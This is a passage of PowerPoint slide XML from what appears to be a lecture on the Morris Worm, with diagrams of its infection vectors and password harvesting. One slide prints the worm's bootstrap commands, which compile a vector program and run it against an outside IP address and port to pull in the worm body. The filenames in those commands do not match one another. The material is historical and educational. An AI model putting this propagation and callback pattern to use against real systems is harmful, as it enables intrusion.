              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="43" name="Verbinder: gewinkelt 42"/>
              <p:cNvCxnSpPr>
                <a:endCxn id="42" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="709388" y="2536244"/>
                <a:ext cx="960139" cy="473789"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">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27" name="Gruppieren 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3159889" y="1943546"/>
              <a:ext cx="4636275" cy="1346876"/>
              <a:chOff x="3159889" y="1943546"/>
              <a:chExt cx="4636275" cy="1346876"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="37" name="Gruppieren 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4613700" y="1943546"/>
                <a:ext cx="3182464" cy="1346876"/>
                <a:chOff x="4476250" y="1573153"/>
                <a:chExt cx="3182464" cy="1346876"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="Textfeld 38"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4560254" y="1573153"/>
                  <a:ext cx="3071495" cy="752254"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="400" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>2. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Infection attempts: </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>(1.) RSH, (2.) Finger, (3.) </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                    <a:t>Sendmail</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="40" name="Pfeil: nach rechts 39"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4476250" y="2642236"/>
                  <a:ext cx="3182464" cy="27779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
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="38" name="Gerade Verbindung mit Pfeil 37"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="42" idx="3"/>
                <a:endCxn id="39" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3159889" y="2293068"/>
                <a:ext cx="1537817" cy="26605"/>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28" name="Gruppieren 27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1319949" y="3519661"/>
              <a:ext cx="6476215" cy="2175962"/>
              <a:chOff x="1319949" y="3519661"/>
              <a:chExt cx="6476215" cy="2175962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="29" name="Gruppieren 28"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1319949" y="4692617"/>
                <a:ext cx="3470649" cy="1003006"/>
                <a:chOff x="1876855" y="4558974"/>
                <a:chExt cx="3470649" cy="1003006"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="33" name="Textfeld 32"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1876855" y="4558974"/>
                  <a:ext cx="3470649" cy="1003006"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="400" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>3. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Collect information about </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>users and hosts, try to break </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>password, try to connect to</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Victims with login-data</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="34" name="Gruppieren 33"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4560252" y="4917314"/>
                  <a:ext cx="610484" cy="487857"/>
                  <a:chOff x="8000117" y="2650708"/>
                  <a:chExt cx="2003858" cy="1496114"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="35" name="Pfeil: nach oben gekrümmt 34"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm rot="10800000">
                    <a:off x="8000117" y="2650708"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25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
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="36" name="Pfeil: nach oben gekrümmt 35"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="8210257" y="3426272"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25000"/>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
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Pfeil: nach rechts 29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4624701" y="3519661"/>
                <a:ext cx="3171463" cy="27779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
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rechteck 30"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5284257" y="4832782"/>
                <a:ext cx="1983674"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User/Password/Hosts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User1/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>abc</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>/Host A, Host B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="32" name="Gerade Verbindung mit Pfeil 31"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="33" idx="3"/>
                <a:endCxn id="31" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4790600" y="5194122"/>
                <a:ext cx="493658" cy="44647"/>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336038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Morris Worm: Vector Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Based on the infection attempt that was successful the code of the vector program is copied, compiled and executed:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="23" name="Tabelle 22"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2694207338"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="396744" y="2314936"/>
          <a:ext cx="11316837" cy="3507130"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5344301">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1464923366"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5972536">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1806040447"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="477318">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Remote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Shell established:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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2000" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Connection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sendmail</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> daemon established:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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69775943"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3029812">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>PATH=/bin:/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>usr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/bin:/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>usr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>ucb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>cd; /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>usr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>tmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>echo gorch49; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>sed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> '/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>zz</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/q' &gt; x1448191O.c; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>echo gorch50 </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>text</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>vector</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>program</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>] </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>zz</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>cc -o z14481910 x14481910.c;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>./x14481910 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>128.32.134.16</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>32341</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>8712440</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
